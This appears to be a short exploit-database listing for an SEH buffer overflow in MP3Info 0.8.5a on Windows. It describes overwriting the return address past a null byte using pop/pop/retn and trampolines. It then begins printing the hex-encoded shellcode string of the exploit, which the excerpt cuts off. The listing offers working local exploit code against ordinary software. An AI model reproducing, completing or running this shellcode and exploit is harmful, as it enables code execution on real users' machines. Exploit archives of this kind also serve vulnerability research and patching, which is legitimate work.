MP3Info-0.8.5a---SEH

The process memory region starts with a null byte but exploitation is still possible because of the little endian architecture provided that the return address gets placed at the end of the buffer, this however confines us in the tiny 4-byte area after pop/pop/retn Using a couple of trampolines I...

MP3Info 0.8.5a - SEH Buffer Overflow Exploit

Exploit for windows platform in category local exploits $shellcode = "\xdb\xd4\xba\x2b\xc5\x7d\xb7\xd9\x74\x24\xf4\x58\x29\xc9" . "\xb1\x32\x31\x50\x17\x83\xe8\xfc\x03\x7b\xd6\x9f\x42\x87" . "\x30\xd6\xad\x77\xc1\x89\x24\x92\xf0\x9b\x53\xd7\xa1\x2b"...